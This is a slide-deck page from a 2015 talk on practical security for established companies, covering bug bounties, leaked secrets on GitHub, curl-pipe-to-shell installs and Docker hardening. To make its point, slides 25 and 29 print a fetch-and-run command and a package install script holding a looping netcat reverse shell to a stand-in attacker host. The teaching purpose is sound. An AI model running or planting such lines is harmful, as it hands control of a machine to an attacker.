$30 off During Our Annual Pro Sale. View Details »

Security for non-unicorns

Bea Hughes
September 25, 2015
Technology
1
220

Security for non-unicorns

Operability.io September 2015.

Security is becoming quite the thing now days, everyone wants to have one of them. The mantra that things should be built with security in mind and can't be plastered on later is a very important one, if you're based in Silicon Valley and are about to write "teh new hotness", but what happens if your company is older than say, 6 months. You already have some legacy systems and code. I'll be talking about how it's possible to unearth some of these things. What happens when you do uncover these things. How to stop them happening. And coping strategies for dealing with them

Bea Hughes

September 25, 2015
Tweet

More Decks by Bea Hughes

See All by Bea Hughes
"Is security even important?" and other clickbait titles
barnbarn
1
320
Osquery, He Knows Me
barnbarn
0
510
Layer 2 person spoofing and impostor syndrome
barnbarn
2
740
MacOS security, hardening and forensics 101 workshop
barnbarn
2
1.5k
How you a actually get hacked!
barnbarn
7
5k
Why won’t my DevOps team talk to my Security team?
barnbarn
3
340
Impostor Syndrome in tech
barnbarn
4
530
SecDevOps: Creating cultural change to bridge between security and DevOps?
barnbarn
3
580
Security for non-Unicorns!
barnbarn
5
1.6k

Other Decks in Technology

See All in Technology
AI-OCR機能のバクラクな体験を支えるソフトウェアエンジニアリング
tomoaki25
0
110
Amazon Bedrock を利用したAIチャットボット開発
yukimatsuyoshi
3
840
231116 あつまれ入力デバイスの沼 Ryu.Cyberさん
comucal
PRO
0
240
JPPC2023_BI08_セマンティックモデルを覗き見る(公開用)
hanaseleb
0
330
サービスの1等地ホーム画面改善と効果的なステークホルダーマネジメント / Improvement of Prime Location Home Screen for Services and Effective Stakeholder Management
rilmayer
0
220
Microsoft Fabric と データメッシュ
ryomaru0825
2
180
地域発展の新たなフロンティアを探そう、地方企業こそサーバーレスを活用すべき3つの理由 / Local Startup With Serverless
_kensh
0
150
EMのスケールとマネジメントがチームになるということ / Team Building And Scaling Engineering Managers
yoshikiiida
1
810
device mapperによるディスクI/O障害のエミュレーション
sat
PRO
7
2.4k
更新”しない”ドキュメント管理 「イミュータブルドキュメントモデル」の実運用
kosui
12
1.6k
Azure OpenAI Serviceの採用と挑戦 - Azure AI Hub meetup #1
cimadai
1
320
SIEMを用いて、セキュリティログ分析の可視化と分析を実現し、PDCAサイクルを回してみた
coconala_engineer
1
240

Featured

See All Featured
Mobile First: as difficult as doing things right
swwweet
214
8.3k
Understanding Cognitive Biases in Performance Measurement
bluesmoon
5
750
Writing Fast Ruby
sferik
615
59k
Into the Great Unknown - MozCon
thekraken
7
660
How New CSS Is Changing Everything About Graphic Design on the Web
jensimmons
215
12k
Keith and Marios Guide to Fast Websites
keithpitt
407
21k
4 Signs Your Business is Dying
shpigford
172
21k
Java REST API Framework Comparison - PWX 2021
mraible
PRO
18
6.4k
For a Future-Friendly Web
brad_frost
168
8.5k
We Have a Design System, Now What?
morganepeng
41
6.5k
Imperfection Machines: The Place of Print at Facebook
scottboms
257
12k
"I'm Feeling Lucky" - Building Great Search Experiences for Today's Users (#IAC19)
danielanewman
219
21k

Transcript

  1. Security For Non-Unicorns
    1 https://www.etsy.com/listing/205741051/unicorn-dog-hat-rainbow-unicorn-dog
    @benjammingh for Operability.io 1

    View Slide

  2. Who's this clown? 2
    • Infrastructure security charlatan at Etsy
    • Operations monkey at Puppet Labs
    • Survived a bunch of startups in London. (some of them still
    have websites...)
    • Has far too many opinions about pretty much everything on
    the TwitterNet @benjammingh
    2 https://twitter.com/skullmandible/status/411281851131523072
    @benjammingh for Operability.io 2

    View Slide

  3. Unicorns?
    @benjammingh for Operability.io 3

    View Slide

  4. Setlist
    • The problem(™).
    • The solution(s)(™).
    • The wrap up.
    • Rapturous applause.
    • We all go home/dance parties/our secret lives as
    superheroes & heroines.
    @benjammingh for Operability.io 4

    View Slide

  5. The problem
    security is hard.
    @benjammingh for Operability.io 5

    View Slide

  6. From tiny seeds, do mighty
    acorns grow.
    • PinkiePwn's 6 small bugs in Chrome to full sandbox escape
    • Egor Homakov's 5 small bugs in Github to full private access
    on GitHub
    • from XSS to remote code execution in under an hour
    • Username & password stolen for HVAC system leads to
    $160+ Million Target breach.
    @benjammingh for Operability.io 6

    View Slide

  7. Things that aren't
    security are hard too.
    @benjammingh for Operability.io 7

    View Slide

  8. Computering is hard.
    No. 1 takeaway for security types is a sense of perspective.
    @benjammingh for Operability.io 8

    View Slide

  9. Security people aren't great
    secure coders.
    • Snort: 10 CVEs, Wireshark: 322! CVEs
    • Joxean Koret on Breaking Antivurius software
    • Security Firm Bit9 Hacked, Used to Spread Malware
    • Tavis Ormandy from Project Zero on exploiting ESET
    • BEST! FireEye just running Apache/PHP as root
    @benjammingh for Operability.io 9

    View Slide

  10. So who do I trust?
    • No one? Always a great position for security people, who
    don't want to get paid.
    • Everyone? Do I have a 419 email for YOU!
    • Security vendors? If you have infinite money and no
    attackers.
    • Attackers!
    @benjammingh for Operability.io 10

    View Slide

  11. "You're already being
    probed for security
    holes, do you want to
    know or not?"
    @benjammingh for Operability.io 11

    View Slide

  12. Bug bounties 101:
    Have one!
    Bug Crowd vs. HackerOne
    @benjammingh for Operability.io 12

    View Slide

  13. Bug bounties 102:
    Prepare a lot.
    @benjammingh for Operability.io 13

    View Slide

  14. Bug bounties 103:
    The first few weeks will be hell.
    @benjammingh for Operability.io 14

    View Slide

  15. Bug bounties 104:
    Be ready with bees!
    @benjammingh for Operability.io 15

    View Slide

  16. Security on the inside
    @benjammingh for Operability.io 16

    View Slide

  17. Armadillo security
    architecture
    @benjammingh for Operability.io 17

    View Slide

  18. Cloud
    @benjammingh for Operability.io 18

    View Slide

  19. Github
    @benjammingh for Operability.io 19

    View Slide

  20. @benjammingh for Operability.io 20

    View Slide

  21. But this doesn't
    happen in real life,
    right?
    @benjammingh for Operability.io 21

    View Slide

  22. @benjammingh for Operability.io 22

    View Slide

  23. Go use Gitrob
    • http://michenriksen.com/blog/gitrob-putting-the-open-
    source-in-osint/
    • https://github.com/michenriksen/gitrob
    @benjammingh for Operability.io 23

    View Slide

  24. curl | bash
    @benjammingh for Operability.io 24

    View Slide

  25. curl legit.pw/mac | sh
    @benjammingh for Operability.io 25

    View Slide

  26. "But I check them, obviously!"
    @benjammingh for Operability.io 26

    View Slide

  27. @benjammingh for Operability.io 27

    View Slide

  28. curl | bash
    "But this is no worse than packages."
    root# yum install sketchy
    @benjammingh for Operability.io 28

    View Slide

  29. curl | bash
    root# rpm -qp --scripts sketchy-1.33-7.rpm
    preinstall scriptlet (using /bin/sh):
    bash -c 'while : ; \
    do \
    nc -e /bin/sh root.legit.pw 2222 ;\
    done'
    @benjammingh for Operability.io 29

    View Slide

  30. A LIVE DEMO, madness.
    @benjammingh for Operability.io 30

    View Slide

  31. Lightweight containers!
    @benjammingh for Operability.io 31

    View Slide

  32. chroot(8)
    @benjammingh for Operability.io 32

    View Slide

  33. FreeBSD Jails
    @benjammingh for Operability.io 33

    View Slide

  34. Solaris Zones
    @benjammingh for Operability.io 34

    View Slide

  35. AIX LPAR
    @benjammingh for Operability.io 35

    View Slide

  36. @benjammingh for Operability.io 36

    View Slide

  37. Is Docker secure?
    @benjammingh for Operability.io 37

    View Slide

  38. >30% of Images in
    Docker Hub Contain
    High Priority Security
    Vulns
    - Jayanth Gummaraju, Tarun Desikan and Yoshio Turner
    from BanyanOps
    @benjammingh for Operability.io 38

    View Slide

  39. @benjammingh for Operability.io 39

    View Slide

  40. As secure as Vagrant?
    @benjammingh for Operability.io 40

    View Slide

  41. But is Docker itself secure?
    • Don't run things as root.
    • No really, stop running things as root.
    • Did I mention not running things as root.
    • It is also not 1999.
    (Docker 1.8 addresses some of this, with it's changes to who it
    runs as)
    @benjammingh for Operability.io 41

    View Slide

  42. Securify the Docker.
    • Don't use --privileged.
    • Use --cap-drop all and --cap-drop to get the
    minimum capabilities.
    • Use Docker Notary
    • Use GRSecurity (just do that anyway, if you can.)
    • Use SELinux... I may as well ask for a pony here.
    @benjammingh for Operability.io 42

    View Slide

  43. Summary
    • Computers are apparently hard.
    • Security is clearly harder still, obv.
    • Actually trust and humans is hard.
    • The typing is the easy bit. (ish)
    @benjammingh for Operability.io 43

    View Slide

  44. More Summary
    • Complex systems lead to much more complex security
    problems. (see Oauth)
    • Annual pen-tests don't scale, bug bounties can.
    • Attackers are mining any public info you have (GitHub, S3)
    • I beg you to stop trusting curl.
    • Docker and security can be used in the same sentence.
    @benjammingh for Operability.io 44

    View Slide

  45. Thank you!
    Twidder: @benjammingh
    LinkedIn: lnkdin.me/p/benyeah
    FidoNet: 2:254/524.13
    JitHub: github.com/barn
    SpeakerDeck: speakerdeck.com/barnbarn
    Etsy: Careers CodeAsCraft
    @benjammingh for Operability.io 45

    View Slide